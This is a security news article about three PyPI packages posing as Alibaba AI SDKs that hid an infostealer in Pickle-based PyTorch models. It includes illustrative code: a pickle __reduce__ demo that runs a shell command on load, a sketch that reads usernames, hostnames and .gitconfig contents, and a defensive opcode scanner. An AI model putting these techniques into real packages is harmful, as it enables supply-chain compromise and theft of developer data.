Malicious Machine Learning Model Attack Discovered on PyPI

2025-05-27 13:00:00

By Alessandro Mascellino

A new campaign exploiting machine learning (ML) models via the Python Package Index (PyPI) has been observed by cybersecurity researchers.

ReversingLabs said threat actors are using the Pickle file format to conceal malware inside seemingly legitimate AI-related software packages.

In this recent incident, attackers published three deceptive packages: aliyun-ai-labs-snippets-sdk, ai-labs-snippets-sdk and aliyun-ai-labs-sdk, claiming to offer a Python SDK for Alibaba’s AI services.

These packages, however, contained no functional code related to AI. Instead, they deployed an infostealer payload embedded within PyTorch models, which are essentially zipped Pickle files.

Upon installation, the payload was activated from the initialization script.
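
ReversingLabs did not publish the loader verbatim. Purely as an illustration, an initialization script of this kind might look like the minimal sketch below, where the package layout and the model filename are our assumptions:

```python
# Hypothetical __init__.py of a trojanized "SDK" package (illustrative
# sketch only; the actual filenames and loader code were not published).
import os
import torch

_MODEL_PATH = os.path.join(os.path.dirname(__file__), "weights.pth")

# torch.load() unpickles the archive's embedded data.pkl; a poisoned
# pickle runs its payload here, the moment the package is imported.
_weights = torch.load(_MODEL_PATH, weights_only=False)
```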

The malware was designed to extract the following, as illustrated in the sketch after this list:

  • User and network information
  • The target machine’s organizational affiliation
  • Contents of the .gitconfig file
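
To make that list concrete, the sketch below (our illustration with hypothetical function names, not the actual malware's code) shows how this kind of host reconnaissance is typically gathered in Python:

```python
import getpass
import pathlib
import socket

def collect_host_info() -> dict:
    """Gather the kind of data the infostealer is reported to target."""
    info = {
        "user": getpass.getuser(),     # local account name
        "host": socket.gethostname(),  # machine/network identity
    }
    gitconfig = pathlib.Path.home() / ".gitconfig"
    if gitconfig.exists():
        # .gitconfig commonly reveals a developer's name, email and, via
        # the email domain, their organizational affiliation
        info["gitconfig"] = gitconfig.read_text(errors="ignore")
    return info
```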

Notably, the malicious models also attempted to identify developers associated with the Chinese video conferencing tool AliMeeting, suggesting a regional focus.

Read more on software supply chain security: AI Hallucinations Create “Slopsquatting” Supply Chain Threat

PyTorch and Pickle: A Dangerous Combination

According to ReversingLabs, this incident highlights the growing threat posed by the misuse of ML model formats.

Pickle allows serialized Python objects to execute arbitrary code. As a result, it has become a preferred vector for attackers aiming to bypass traditional security controls. Two of the three identified packages used this method to deliver fully functional malware.
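
The mechanics are easy to demonstrate. The self-contained sketch below (a benign example of the technique, not the campaign's actual payload) shows how an object can embed a command that runs the moment the pickle is loaded:

```python
import os
import pickle

class Payload:
    # pickle calls __reduce__ to learn how to rebuild the object;
    # returning (callable, args) means "call this during unpickling".
    def __reduce__(self):
        return (os.system, ("echo code ran during unpickling",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # merely loading the bytes executes the command
```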

The researchers believe ML model formats appeal to attackers because many security tools do not yet support robust detection of malicious behavior embedded within such files.

“Security tools are at a primitive level when it comes to malicious ML model detection,” said Karlo Zanki, a reverse engineer at ReversingLabs. 

“Legacy security tooling is currently lacking this required functionality.”

The infected packages were briefly available on PyPI and downloaded approximately 1,600 times before removal.

While the exact method used to lure users remains unclear, social engineering or phishing is suspected.

As AI and ML tools become central to software development, this attack underscores the need for stricter validation and zero-trust principles in handling ML artifacts.
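
Concretely, ML artifacts can be treated like untrusted code: newer PyTorch releases support torch.load(..., weights_only=True), which restricts unpickling to tensor data, and the standard library's pickletools module can flag risky opcodes before a file is loaded at all. The scanner below is our minimal sketch, and its opcode shortlist is a heuristic assumption rather than an exhaustive rule set:

```python
import pickletools

# Opcodes that import objects or invoke callables during unpickling;
# a plain weights pickle rarely needs these (heuristic, not exhaustive).
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ"}

def scan_pickle(path: str) -> list[str]:
    """Return the names of suspicious opcodes found in a pickle stream."""
    with open(path, "rb") as f:
        return [op.name for op, arg, pos in pickletools.genops(f)
                if op.name in SUSPICIOUS]
```

Note that a PyTorch .pth file is a ZIP archive, so the data.pkl member inside it would be extracted and scanned rather than the archive itself.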


Summary

Cybersecurity researchers at ReversingLabs have detected a new campaign where threat actors exploit machine learning models via PyPI by concealing malware in seemingly legitimate AI-related software packages. The attackers published three deceptive Python SDK packages for Alibaba's AI services, which instead contained infostealer payloads within PyTorch models using the Pickle file format. These payloads were designed to extract user and network information, identify organizational affiliation, and access .gitconfig files upon installation. The attack highlights security vulnerabilities related to ML model formats and the need for improved detection mechanisms in legacy security tools.